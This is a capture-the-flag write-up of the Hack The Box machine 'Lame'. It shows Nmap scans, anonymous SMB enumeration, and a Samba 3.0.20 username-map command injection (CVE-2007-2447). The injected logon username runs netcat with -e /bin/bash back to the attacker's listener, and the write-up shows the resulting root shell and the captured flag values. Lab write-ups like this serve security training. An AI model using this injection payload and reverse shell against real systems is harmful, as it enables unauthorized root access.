Nmap TCP results

Nmap scan report for 10.10.10.3
Host is up, received user-set (0.092s latency).
Scanned at 2020-07-16 11:53:26 CEST for 258s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALz4hsc8a2Srq4nlW960qV8xwBG0JC+jI7fWxm5METIJH4tKr/xUTwsTYEYnaZLzcOiy21D3ZvOwYb6AA3765zdgCd2Tgand7F0YD5UtXG7b7fbz99chReivL0SIWEG/E96Ai+pqYMP2WD5KaOJwSIXSUajnU5oWmY5x85sBw+XDAAAAFQDFkMpmdFQTF+oRqaoSNVU7Z+hjSwAAAIBCQxNKzi1TyP+QJIFa3M0oLqCVWI0We/ARtXrzpBOJ/dt0hTJXCeYisKqcdwdtyIn8OUCOyrIjqNuA2QW217oQ6wXpbFh+5AQm8Hl3b6C6o8lX3Ptw+Y4dp0lzfWHwZ/jzHwtuaDQaok7u1f971lEazeJLqfiWrAzoklqSWyDQJAAAAIA1lAD3xWYkeIeHv/R3P9i+XaoI7imFkMuYXCDTq843YU6Td+0mWpllCqAWUV/CQamGgQLtYy5S0ueoks01MoKdOMMhKVwqdr08nvCBdNKjIEd3gH6oBk/YRnjzxlEAYBsvCmM4a0jmhz0oNiRWlc/F+bkUeFKrBx/D2fdfZmhrGg==
|   2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|broadband router|remote management|general purpose|storage-misc
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Arris embedded (92%), Dell embedded (92%), Dell iDRAC 6 (92%), ZyXEL embedded (92%), Belkin embedded (90%)
OS CPE: cpe:/o:linux:linux_kernel:2.4.30 cpe:/h:dell:remote_access_card:6 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware cpe:/h:zyxel:nsa-200 cpe:/h:belkin:n300
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.22 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), ZyXEL NSA-200 NAS device (92%), DD-WRT v24-sp1 (Linux 2.4.36) (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=7/16%OT=21%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5F102498%P=x86_64-pc-linux-gnu)
SEQ(SP=D0%GCD=1%ISR=CE%TI=Z%II=I%TS=7)
OPS(O1=M54BST11NW5%O2=M54BST11NW5%O3=M54BNNT11NW5%O4=M54BST11NW5%O5=M54BST11NW5%O6=M54BST11)
WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)
ECN(R=Y%DF=Y%TG=40%W=16D0%O=M54BNNSNW5%CC=N%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 0.002 days (since Thu Jul 16 11:54:42 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3d00h54m33s, deviation: 2h49m44s, median: -3d02h54m35s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 63867/tcp): CLEAN (Timeout)
|   Check 3 (port 22553/udp): CLEAN (Timeout)
|   Check 4 (port 40169/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-07-13T03:02:32-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   126.94 ms 10.10.16.1
2   79.17 ms  10.10.10.3

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 16 11:57:44 2020 -- 1 IP address (1 host up) scanned in 258.75 seconds

Nmap FTP scan results:

Nmap scan report for 10.10.10.3
Host is up, received user-set (0.094s latency).
Scanned at 2020-07-16 11:54:27 CEST for 23s

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 2.3.4
|_banner: 220 (vsFTPd 2.3.4)
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_sslv2-drown: 
Service Info: OS: Unix

SMB nmap results:

sudo nmap --reason -Pn -sV -p 445,139 --script=vuln --script-args=unsafe=1  10.10.10.3 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 12:22 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.3
Host is up, received user-set (0.059s latency).

PORT    STATE SERVICE     REASON         VERSION
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.35 seconds

Exploring the Samba shares return an error:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient -L //10.10.10.3  
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

To avoid this error, I added to the smb.cfg the following lines, in the [global] section

client min protocol = CORE
client max protocol = SMB3

Now I can continue analyzing the Samba protocol and shares:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient -L //10.10.10.3  
Enter WORKGROUP\lillox's password: 
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    tmp             Disk      oh noes!
    opt             Disk      
    IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
    ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            LAME

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient  //10.10.10.3/tmp     
Enter WORKGROUP\lillox's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 

The Samba version is 3.0.20, so it could be vulnerable to CVE2007-2447. By sending shell metacharacters into the username we trigger the bug which allows us to execute arbitrary commands on the device through the username, when attempting an SMB connection. No authentication is required to exploit this due to the fact that the option is used to map usernames prior to authentication. Firstly we need to setup a listener, on the attacker machine

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  nc -lvp 8888
listening on [any] 8888 ...

Then, we issue a logon command in the smb session we opened before, creating a payload to open a reverse shell

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient  //10.10.10.3/tmp     
Enter WORKGROUP\lillox's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nc 10.10.16.106 8888 -e /bin/bash`"
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \> 

Going back to the listener:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  nc -lvp 8888
listening on [any] 8888 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.16.106] from (UNKNOWN) [10.10.10.3] 34382
id
uid=0(root) gid=0(root)

So we have a root shell, we can find all the flags :)

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  nc -lvp 8888
listening on [any] 8888 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.16.106] from (UNKNOWN) [10.10.10.3] 34382
id
uid=0(root) gid=0(root)

find / -iname user.txt
/home/makis/user.txt
cat /home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5
cat /root/root.txt
92caac3be140ef409e45721348a4e9df

- lilloX

Share on: Diaspora*TwitterFacebookLinkedInHackerNewsEmailReddit


Comments

comments powered by Disqus